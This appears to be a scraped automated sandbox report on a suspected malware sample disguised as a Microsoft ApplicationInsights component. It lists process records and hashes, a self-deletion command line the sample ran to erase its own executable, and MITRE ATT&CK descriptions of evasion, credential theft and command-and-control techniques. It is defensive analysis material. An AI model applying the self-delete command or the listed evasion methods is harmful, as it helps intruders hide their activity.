Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 5576 Parent PID: 2216

General

Start time:	15:55:36
Start date:	13/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: timeout.exe PID: 5624 Parent PID: 2216

General

Start time:	15:55:37
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0x2a0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: WerFault.exe PID: 5568 Parent PID: 7056

General

Start time:	15:55:41
Start date:	13/09/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156
Imagebase:	0xb00000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre